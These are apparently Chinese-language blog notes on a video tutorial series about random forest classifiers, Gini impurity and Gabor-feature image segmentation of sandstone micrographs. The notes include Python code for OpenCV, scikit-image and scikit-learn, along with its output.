    # Update dataframe for images to include details for each image in the loop
    image_dataset = image_dataset.append(df)
    • STEP 2: READ LABELED IMAGES (MASKS) AND CREATE ANOTHER DATAFRAME WITH LABEL VALUES AND LABEL FILE NAMES
    mask_dataset = pd.DataFrame()  # Create dataframe to capture mask info.

    mask_path = "images/train_masks/"
    for mask in os.listdir(mask_path): # iterate through each file to perform some action
    print(mask)

    df2 = pd.DataFrame() # Temporary dataframe to capture info for each mask in the loop
    input_mask = cv2.imread(mask_path + mask)

    # Check if the input mask is RGB or grey and convert to grey if RGB
    if input_mask.ndim == 3 and input_mask.shape[-1] == 3:
    label = cv2.cvtColor(input_mask,cv2.COLOR_BGR2GRAY)
    elif input_mask.ndim == 2:
    label = input_mask
    else:
    raise excerption("The module works only with grayscale and RGB images!")

    # Add pixel values to the data frame
    label_values = label.reshape(-1)
    df2['Label_Value'] = label_values
    df2['Mask_Name'] = mask

    mask_dataset = mask_dataset.append(df2) # Update mask dataframe with all the info from each mask
    • STEP 3: GET DATA READY FOR RANDOM FOREST (or other classifier) COMBINE BOTH DATAFRAMES INTO A SINGLE DATASET
    dataset = pd.concat([image_dataset, mask_dataset], axis=1)  # Concatenate both image and mask datasets

    # If you expect image and mask names to be the same this is where we can perform sanity check
    # dataset['Image_Name'].equals(dataset['Mask_Name'])
    # If we do not want to include pixels with value 0
    # e.g. Sometimes unlabeled pixels may be given a value 0.
    dataset = dataset[dataset.Label_Value != 0]

    # Assign training features to X and labels to Y
    # Drop columns that are not relevant for training (non-features)
    X = dataset.drop(labels = ["Image_Name", "Mask_Name", "Label_Value"], axis=1)

    # Assign label values to Y (our prediction)
    Y = dataset["Label_Value"].values

    # Split data into train and test to verify accuracy after fitting the model.
    from sklearn.model_selection import train_test_split
    X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=20)
    • STEP 4: Define the classifier and fit a model with our training data
    # Import training classifier
    from sklearn.ensemble import RandomForestClassifier
    # Instantiate model with n number of decision trees
    model = RandomForestClassifier(n_estimators = 50, random_state = 42)

    # Train the model on training data
    model.fit(X_train, y_train)
    • STEP 5: Accuracy check
    from sklearn import metrics

    prediction_test = model.predict(X_test)
    # Check accuracy on test dataset.
    print("Accuracy = ", metrics.accuracy_score(y_test, prediction_test))
    • STEP 6: SAVE MODEL FOR FUTURE USE
    # You can store the model for future use. In fact, this is how you do machine elarning
    # Train on training images, validate on test images and deploy the model on unknown images.
    # Save the trained model as pickle string to disk for future use
    model_name = "sandstone_model"
    pickle.dump(model, open(model_name, 'wb'))
    ]]>
    + 正文

    59 - What is Random Forest classifier

    很多的决策树在一起就变成了森林,就是随机森林了。

    • 决策树

    比如要将一张图分类成:

    • Air 空气

    • Pyrite 黄铁矿

    • Clay 粘土

    • Pore 孔洞

    • Quartz 石英

    从图像的 Pixel Value 灰度值和 Texture 纹理进行分类:

    jpg

    • Why start with pixel value and not texture metric for this image?

      • 为什么从像素值开始,而不是纹理度量这张图像?
    • Because it gives the best split of input data.

      • 因为它给出了输入数据的最佳分割。
    • How to pick a node that gives the best split?

      • 如何选择一个能给出最佳分割的节点?
    • Use Gini impurity → pick the one that maximizes the Gini gain.

      • 使用基尼系数→选择一个使基尼系数增益最大化的。
    • Gini lmpurity is the probability of incorrectly classifying a randomly chosenelement in the dataset if it were randomly labeled according to the classdistribution in the dataset. lt’s calculated as

      • 基尼系数是指数据集中随机选择的元素,如果根据数据集中的类别分布随机标记,则错误分类的概率。计算为

    $$G=\sum^C_{i=1}p(i)*\left(1-p(i)\right)$$

    • where $C$ is the number of classes and $p(i)$ is the probability of randomly picking an element of class $i$.

      • 其中 $C$ 是类的数量,$p(i)$ 是随机抽取类 $i$ 中的一个元素的概率。
    • Primary Disadvantage of decision trees:
      Often suffers from overfitting →works well on training data but fails on newdata leading to low accuracy.

      • 决策树的主要缺点:

        经常存在过拟合问题→在训练数据上很好,但在新数据上失败,导致精度低。

    • Random Forest to the rescue!

      • 使用决策森林规避决策树的缺点。

    jpg

    60 - How to use Random Forest in Python

    1
    2
    3
    4
    5
    6
    import pandas as pd
    import matplotlib.pyplot as plt
    import numpy as np

    df = pd.read_csv('data/images_analyzed_productivity1.csv')
    df.head()
    User Time Coffee Age Images_Analyzed Productivity
    0 1 8 0 23 20 Good
    1 1 13 0 23 14 Bad
    2 1 17 0 23 18 Good
    3 1 22 0 23 15 Bad
    4 1 8 2 23 22 Good
    1
    2
    sizes = df['Productivity'].value_counts(sort=1)
    sizes
    Bad     42Good    38Name: Productivity, dtype: int64

    去除无关的列

    1
    2
    3
    df.drop(['Images_Analyzed'], axis=1, inplace=True)
    df.drop(['User'], axis=1, inplace=True)
    df.head()
    Time Coffee Age Productivity
    0 8 0 23 Good
    1 13 0 23 Bad
    2 17 0 23 Good
    3 22 0 23 Bad
    4 8 2 23 Good

    删除缺失数据

    1
    df = df.dropna()

    将分析结果转换为数字

    1
    2
    3
    df.Productivity[df.Productivity == 'Good'] = 1
    df.Productivity[df.Productivity == 'Bad'] = 2
    df.head()
    Time Coffee Age Productivity
    0 8 0 23 1
    1 13 0 23 2
    2 17 0 23 1
    3 22 0 23 2
    4 8 2 23 1

    定义因变量

    1
    2
    3
    Y = df['Productivity'].values
    Y = Y.astype('int')
    Y
    array([1, 2, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2,       1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 1,       1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2,       1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2])

    定义自变量

    1
    X = df.drop(labels=['Productivity'], axis=1)

    将数据分割为训练集和测试集

    1
    2
    3
    from sklearn.model_selection import train_test_split

    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)

    使用随机森林

    sklearn.ensemble.RandomForestClassifier

    1
    2
    3
    4
    5
    6
    from sklearn.ensemble import RandomForestClassifier

    model = RandomForestClassifier(n_estimators=10, random_state=30)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
    prediction_test
    array([1, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 1, 2, 1, 2,       1, 1, 2, 1, 1, 2, 1, 1, 1, 1])

    计算训练出的结果的精确度

    1
    2
    3
    from sklearn import metrics

    print('Accuracy =', metrics.accuracy_score(Y_test, prediction_test))
    Accuracy = 0.9375

    扩大训练集的比例可以增加精确度

    1
    2
    3
    4
    5
    6
    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=20)
    model = RandomForestClassifier(n_estimators=10, random_state=30)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
    prediction_test
    print('Accuracy =', metrics.accuracy_score(Y_test, prediction_test))
    Accuracy = 0.9375

    显示特征值的重要性

    1
    2
    3
    feature_list = list(X.columns)
    feature_imp = pd.Series(model.feature_importances_, index=feature_list).sort_values(ascending=False)
    feature_imp
    Time      0.714433Coffee    0.205474Age       0.080092dtype: float64

    随机森林可视化

    python 随机森林可视化_阿雷吖睚的博客-CSDN 博客_随机森林可视化

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    from IPython.display import HTML, display
    from sklearn import tree
    import pydotplus

    estimators = model.estimators_
    for m in estimators:
    dot_data = tree.export_graphviz(m, out_file=None,
    feature_names=['Time', 'Coffee', 'Age'],
    class_names=['Good', 'Bad'],
    filled=True, rounded=True,
    special_characters=True)
    graph = pydotplus.graph_from_dot_data(dot_data)
    # 使用 ipython 的终端 jupyter notebook 显示。
    svg = graph.create_svg()
    if hasattr(svg, "decode"):
    svg = svg.decode("utf-8")
    html = HTML(svg)
    display(html)

    svg

    61 - How to create Gabor feature banks for machine learning

    1
    2
    3
    4
    import numpy as np
    import cv2
    import matplotlib.pyplot as plt
    import pandas as pd
    1
    img = cv2.imread('images/synthetic.jpg', 0)
    1
    2
    3
    4
    df = pd.DataFrame()
    img2 = img.reshape(-1)
    df['Original Pixels'] = img2
    df
    Original Pixels
    0 255
    1 255
    2 255
    3 255
    4 255
    ... ...
    363446 255
    363447 255
    363448 255
    363449 255
    363450 255

    363451 rows × 1 columns

    设置 Gabor 的不同参数构造出不同的卷积核,生成用于机器学习的 csv 文件:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    num = 1
    for sigma in (3, 5):
    for theta in range(2):
    theta = theta / 4. * np.pi
    for lamda in np.arange(0, np.pi, np.pi / 4.):
    for gamma in (0.05, 0.5):
    gabor_label = 'Gabor ' + str(num)
    kernel = cv2.getGaborKernel((5, 5), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    filtered_img = fimg.reshape(-1)
    df[gabor_label] = filtered_img
    num += 1
    1
    df.head()
    Original Pixels Gabor 1 Gabor 2 Gabor 3 Gabor 4 Gabor 5 Gabor 6 Gabor 7 Gabor 8 Gabor 9 ... Gabor 23 Gabor 24 Gabor 25 Gabor 26 Gabor 27 Gabor 28 Gabor 29 Gabor 30 Gabor 31 Gabor 32
    0 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    1 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    2 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    3 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    4 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255

    5 rows × 33 columns

    1
    df.to_csv('Gabor.csv')

    png

    62 - Image Segmentation using traditional machine learning - The plan

    ​ 讲了下后面几篇视频要干啥。

    63 - Image Segmentation using traditional machine learning Part1 - FeatureExtraction

    1
    2
    3
    4
    5
    6
    7
    import numpy as np
    import cv2
    import pandas as pd
    import matplotlib.pyplot as plt

    img = cv2.imread('images/Train_images/Sandstone_Versa0000.tif', 0)
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x17d0c13f730>

    png

    1
    df = pd.DataFrame()
    • Add original pixel values to the data frame as feature #1
    1
    2
    3
    img2 = img.reshape(-1)
    df['Original Image'] = img2
    df.head()
    Original Image
    0 0
    1 0
    2 0
    3 0
    4 0
    • Add Other features

    • First set - Gabor features

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    # Generate Gabor features
    num = 1 # To count numbers up in order to give Gabor features a lable in the data frame
    kernels = []
    for theta in range(2): # Define number of thetas
    theta = theta / 4. * np.pi
    for sigma in (1, 3): # Sigma with 1 and 3
    for lamda in np.arange(0, np.pi, np.pi / 4): # Range of wavelengths
    for gamma in (0.05, 0.5): # Gamma values of 0.05 and 0.5
    gabor_label = 'Gabor' + str(num) # Label Gabor columns as Gabor1, Gabor2, etc.
    ksize = 9
    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
    kernels.append(kernel)
    # Now filter the image and add values to a new column
    fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
    filtered_img = fimg.reshape(-1)
    df[gabor_label] = filtered_img # Labels columns as Gabor1, Gabor2, etc.
    print(gabor_label, ': theta =', theta, ': sigma =', sigma, ': lamda =', lamda, ': gamma =', gamma)
    num += 1 # Increment for gabor column label
    Gabor1 : theta = 0.0 : sigma = 1 : lamda = 0.0 : gamma = 0.05Gabor2 : theta = 0.0 : sigma = 1 : lamda = 0.0 : gamma = 0.5Gabor3 : theta = 0.0 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.05Gabor4 : theta = 0.0 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.5Gabor5 : theta = 0.0 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.05Gabor6 : theta = 0.0 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.5Gabor7 : theta = 0.0 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.05Gabor8 : theta = 0.0 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.5Gabor9 : theta = 0.0 : sigma = 3 : lamda = 0.0 : gamma = 0.05Gabor10 : theta = 0.0 : sigma = 3 : lamda = 0.0 : gamma = 0.5Gabor11 : theta = 0.0 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.05Gabor12 : theta = 0.0 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.5Gabor13 : theta = 0.0 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.05Gabor14 : theta = 0.0 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.5Gabor15 : theta = 0.0 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.05Gabor16 : theta = 0.0 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.5Gabor17 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.0 : gamma = 0.05Gabor18 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.0 : gamma = 0.5Gabor19 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.05Gabor20 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.5Gabor21 : theta = 0.7853981633974483 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.05Gabor22 : theta = 0.7853981633974483 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.5Gabor23 : theta = 0.7853981633974483 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.05Gabor24 : theta = 0.7853981633974483 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.5Gabor25 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.0 : gamma = 0.05Gabor26 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.0 : gamma = 0.5Gabor27 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.05Gabor28 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.5Gabor29 : theta = 0.7853981633974483 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.05Gabor30 : theta = 0.7853981633974483 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.5Gabor31 : theta = 0.7853981633974483 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.05Gabor32 : theta = 0.7853981633974483 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.5
    • Gerate OTHER FEATURES and add them to the data frame

    • Canny edge

    1
    2
    3
    edges = cv2.Canny(img, 100, 200)
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1
    • ROBERTS EDGE
    1
    2
    3
    4
    5
    from skimage.filters import roberts, sobel, scharr, prewitt

    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1
    • SOBEL
    1
    2
    3
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1
    • SCHARR
    1
    2
    3
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1
    • PREWITT
    1
    2
    3
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1
    • GAUSSIAN with sigma = 3
    1
    2
    3
    4
    5
    from scipy import ndimage as nd

    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1
    • GAUSSIAN with sigma = 7
    1
    2
    3
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3
    • MEDIAN with sigma = 3
    1
    2
    3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1
    • VARIANCE with size = 3
    1
    2
    3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1 # Add column to original dataframe

    1
    df.head()
    Original Image Gabor1 Gabor2 Gabor3 Gabor4 Gabor5 Gabor6 Gabor7 Gabor8 Gabor9 ... Gabor32 Canny Edge Roberts Sobel Scharr Prewitt Gaussian s3 Gaussian s7 Median s3 Variance s3
    0 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    1 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    2 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    3 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    4 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0

    5 rows × 42 columns


    1
    2
    3
    labeled_img = cv2.imread('images/Train_masks/Sandstone_Versa0000.tif', 0)
    labeled_img1 = labeled_img.reshape(-1)
    df['Label'] = labeled_img1

    64 - Image Segmentation using traditional machine learning - Part2 Training RF

    • Dependent variable
    1
    2
    Y = df['Label'].values
    X = df.drop(labels=['Label'], axis=1)
    • Split data into test and train
    1
    2
    3
    from sklearn.model_selection import train_test_split

    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
    • Import ML algorithm and train the model
    1
    2
    3
    4
    5
    from sklearn.ensemble import RandomForestClassifier

    model = RandomForestClassifier(n_estimators=10, random_state=42)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
    1
    2
    3
    from sklearn import metrics

    print("Accuracy =", metrics.accuracy_score(Y_test, prediction_test))
    Accuracy = 0.9812850216441728

    65 - Image Segmentation using traditional machine learning - Part3 Feature Ranking

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    fig = plt.figure(figsize=(12, 16))
    p = 1
    for index, feature in enumerate(df.columns):
    if index == 0:
    p += 1
    ax = fig.add_subplot(181)
    plt.xticks([])
    plt.yticks([])
    ax.imshow(img, cmap='gray')
    ax.title.set_text(feature)
    else:
    if p % 8 == 1:
    p += 1
    exec("ax" + str(index) + "=fig.add_subplot(6, 8, " + str(p) + ")")
    plt.xticks([])
    plt.yticks([])
    exec("ax" + str(index) + ".imshow(np.array(df[feature]).reshape(img.shape), cmap='gray')")
    exec("ax" + str(index) + ".title.set_text('" + feature + "')")
    p += 1
    plt.show()

    png

    1
    2
    3
    4
    importances = list(model.feature_importances_)
    features_list = list(X.columns)
    feature_imp = pd.Series(model.feature_importances_, index=features_list).sort_values(ascending=False)
    feature_imp
    Gabor4            0.248493Gaussian s3       0.168623Median s3         0.122685Original Image    0.092540Gabor8            0.086585Gabor11           0.076893Gabor3            0.070587Gabor6            0.021357Gaussian s7       0.020470Gabor24           0.011645Gabor7            0.010555Prewitt           0.010252Gabor21           0.007676Sobel             0.007102Gabor23           0.006989Gabor5            0.006329Scharr            0.005543Roberts           0.005393Gabor22           0.004461Variance s3       0.002942Gabor31           0.002886Gabor29           0.002720Gabor32           0.002607Gabor30           0.002361Canny Edge        0.001267Gabor12           0.001025Gabor20           0.000011Gabor28           0.000002Gabor27           0.000002Gabor14           0.000000Gabor26           0.000000Gabor25           0.000000Gabor1            0.000000Gabor19           0.000000Gabor18           0.000000Gabor17           0.000000Gabor16           0.000000Gabor10           0.000000Gabor9            0.000000Gabor15           0.000000Gabor2            0.000000Gabor13           0.000000dtype: float64

    66 - Image Segmentation using traditional machine learning - Part4 Pickling Model

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import pickle

    filename = 'sandstone_model'
    pickle.dump(model, open(filename, 'wb'))

    load_model = pickle.load(open(filename, 'rb'))
    result = load_model.predict(X)

    segmented = result.reshape((img.shape))
    1
    2
    3
    import matplotlib.pyplot as plt

    plt.imshow(segmented, cmap='jet')
    <matplotlib.image.AxesImage at 0x17d37062220>

    png

    1
    plt.imsave('segmented_rock.jpg', segmented, cmap='jet')

    67 - Image Segmentation using traditional machine learning - Part5 Segmenting Images

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    import numpy as np
    import cv2
    import pandas as pd

    def feature_extraction(img):
    df = pd.DataFrame()


    # All features generated must match the way features are generated for TRAINING.
    # Feature1 is our original image pixels
    img2 = img.reshape(-1)
    df['Original Image'] = img2

    # Generate Gabor features
    num = 1
    kernels = []
    for theta in range(2):
    theta = theta / 4. * np.pi
    for sigma in (1, 3):
    for lamda in np.arange(0, np.pi, np.pi / 4):
    for gamma in (0.05, 0.5):
    gabor_label = 'Gabor' + str(num)
    ksize=9
    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
    kernels.append(kernel)
    # Now filter image and add values to new column
    fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
    filtered_img = fimg.reshape(-1)
    df[gabor_label] = filtered_img # Modify this to add new column for each gabor
    num += 1
    ########################################
    # Geerate OTHER FEATURES and add them to the data frame
    # Feature 3 is canny edge
    edges = cv2.Canny(img, 100,200) # Image, min and max values
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1 # Add column to original dataframe

    from skimage.filters import roberts, sobel, scharr, prewitt

    # Feature 4 is Roberts edge
    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1

    # Feature 5 is Sobel
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1

    # Feature 6 is Scharr
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1

    # Feature 7 is Prewitt
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1

    # Feature 8 is Gaussian with sigma=3
    from scipy import ndimage as nd
    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1

    # Feature 9 is Gaussian with sigma=7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3

    # Feature 10 is Median with sigma=3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1

    # Feature 11 is Variance with size=3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1 # Add column to original dataframe

    return df
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    import glob
    import pickle
    from matplotlib import pyplot as plt

    filename = "sandstone_model"
    loaded_model = pickle.load(open(filename, 'rb'))

    path = "images/Train_images/*.tif"
    for file in glob.glob(path):
    print(file) # just stop here to see all file names printed
    img = cv2.imread(file, 0)
    # Call the feature extraction function.
    X = feature_extraction(img)
    result = loaded_model.predict(X)
    segmented = result.reshape((img.shape))

    name = file.split("e_")
    cv2.imwrite('images/Segmented/'+ name[1], segmented)

    jpg

    67b - Feature based image segmentation using traditional machine learning. -Multi-training images-

    总结通过传统机器学习方法进行图像分类的各个步骤。

    使用随机森林或支持向量机,这是传统的机器学习方法之一,我相信这比深度学习方法要好得多,因为对于大多数应用程序来说,您通常没有深度学习所需的数据类型,因此传统机器学习有时效果很好,如果您没有大量训练数据,实际上有时比深度学习好得多。

    1
    2
    3
    4
    5
    6
    import numpy as np
    import cv2
    import pandas as pd
    import pickle
    from matplotlib import pyplot as plt
    import os
    • STEP 1: READ TRAINING IMAGES AND EXTRACT FEATURES
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    image_dataset = pd.DataFrame()  # Dataframe to capture image features

    img_path = "images/train_images/"
    for image in os.listdir(img_path): # iterate through each file
    print(image)

    df = pd.DataFrame() # Temporary data frame to capture information for each loop.
    # Reset dataframe to blank after each loop.

    input_img = cv2.imread(img_path + image) # Read images

    # Check if the input image is RGB or grey and convert to grey if RGB
    if input_img.ndim == 3 and input_img.shape[-1] == 3:
    img = cv2.cvtColor(input_img,cv2.COLOR_BGR2GRAY)
    elif input_img.ndim == 2:
    img = input_img
    else:
    raise excerption("The module works only with grayscale and RGB images!")

    ################################################################
    # START ADDING DATA TO THE DATAFRAME

    # Add pixel values to the data frame
    pixel_values = img.reshape(-1)
    df['Pixel_Value'] = pixel_values # Pixel value itself as a feature
    df['Image_Name'] = image # Capture image name as we read multiple images

    ############################################################################
    # Generate Gabor features
    num = 1 # To count numbers up in order to give Gabor features a lable in the data frame
    kernels = []
    for theta in range(2): # Define number of thetas
    theta = theta / 4. * np.pi
    for sigma in (1, 3): # Sigma with 1 and 3
    for lamda in np.arange(0, np.pi, np.pi / 4): # Range of wavelengths
    for gamma in (0.05, 0.5): # Gamma values of 0.05 and 0.5
    gabor_label = 'Gabor' + str(num) # Label Gabor columns as Gabor1, Gabor2, etc.
    ksize=9
    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
    kernels.append(kernel)
    # Now filter the image and add values to a new column
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    filtered_img = fimg.reshape(-1)
    df[gabor_label] = filtered_img #Labels columns as Gabor1, Gabor2, etc.
    print(gabor_label, ': theta=', theta, ': sigma=', sigma, ': lamda=', lamda, ': gamma=', gamma)
    num += 1 # Increment for gabor column label
    ########################################
    # Gerate OTHER FEATURES and add them to the data frame

    # CANNY EDGE
    edges = cv2.Canny(img, 100,200) #Image, min and max values
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1 #Add column to original dataframe

    from skimage.filters import roberts, sobel, scharr, prewitt

    # ROBERTS EDGE
    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1

    # SOBEL
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1

    # SCHARR
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1

    # PREWITT
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1

    # GAUSSIAN with sigma=3
    from scipy import ndimage as nd
    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1

    # GAUSSIAN with sigma=7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3

    # MEDIAN with sigma=3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1

    # VARIANCE with size=3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1 # Add column to original dataframe

    ######################################
    # Update dataframe for images to include details for each image in the loop
    image_dataset = image_dataset.append(df)
    • STEP 2: READ LABELED IMAGES (MASKS) AND CREATE ANOTHER DATAFRAME WITH LABEL VALUES AND LABEL FILE NAMES
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    mask_dataset = pd.DataFrame()  # Create dataframe to capture mask info.

    mask_path = "images/train_masks/"
    for mask in os.listdir(mask_path): # iterate through each file to perform some action
    print(mask)

    df2 = pd.DataFrame() # Temporary dataframe to capture info for each mask in the loop
    input_mask = cv2.imread(mask_path + mask)

    # Check if the input mask is RGB or grey and convert to grey if RGB
    if input_mask.ndim == 3 and input_mask.shape[-1] == 3:
    label = cv2.cvtColor(input_mask,cv2.COLOR_BGR2GRAY)
    elif input_mask.ndim == 2:
    label = input_mask
    else:
    raise excerption("The module works only with grayscale and RGB images!")

    # Add pixel values to the data frame
    label_values = label.reshape(-1)
    df2['Label_Value'] = label_values
    df2['Mask_Name'] = mask

    mask_dataset = mask_dataset.append(df2) # Update mask dataframe with all the info from each mask
    • STEP 3: GET DATA READY FOR RANDOM FOREST (or other classifier) COMBINE BOTH DATAFRAMES INTO A SINGLE DATASET
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
